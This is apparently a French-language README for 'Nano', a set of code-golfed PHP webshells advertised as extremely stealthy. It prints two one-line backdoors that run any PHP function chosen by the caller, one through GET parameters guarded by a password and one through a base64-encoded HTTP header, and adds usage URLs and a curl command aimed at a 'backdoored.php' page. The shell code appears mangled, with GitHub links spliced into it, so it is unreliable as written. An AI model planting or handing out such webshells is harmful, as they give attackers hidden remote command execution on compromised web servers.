
Nano est une famille de shells web PHP optimisés par code golf pour la furtivité.
Nano est une famille de webshells PHP codés en code golf pour être extrêmement furtifs et efficaces.
Gardez-le à l'œil peut-être, je continuerai à ajouter d'autres webshells ici.
<?=$_GET[p]==_&&$_GET[f](https://github.com/s0md3v/nano/blob/HEAD/$GET_%5Bc%5D);
http://example.com/nano.php?f=function&c=command&p=password
f correspond à la fonction
c correspond à la commande
p correspond au mot de passe
Par exemple, le code ci-dessous exécutera la commande ls :
http://example.com/nano.php?f=system&c=ls&p=password
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0](https://github.com/s0md3v/nano/blob/HEAD/$x%5B1%5D);
Celle-ci est un peu plus complexe.
Disons que vous voulez exécuter system(ls), écrivez donc system~ls puis encodez-le en base64, c'est-à-dire c3lzdGVtKGxzKQ==
Ajoutez maintenant 1 caractère quelconque au début. Disons 'x', cela donnera donc xc3lzdGVtKGxzKQ==
Ouvrez maintenant votre terminal et tapez la commande suivante :
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
Trop de travail ? Vous pouvez utiliser le handler à la place.

C'est mon premier truc en PHP, donc s'il existe une meilleure façon de faire ce que j'ai fait, faites-le-moi savoir ou ouvrez une pull request.
Le projet nano est sous licence MIT, ce qui signifie essentiellement que vous devez me créditer si vous voulez le redistribuer ou le modifier.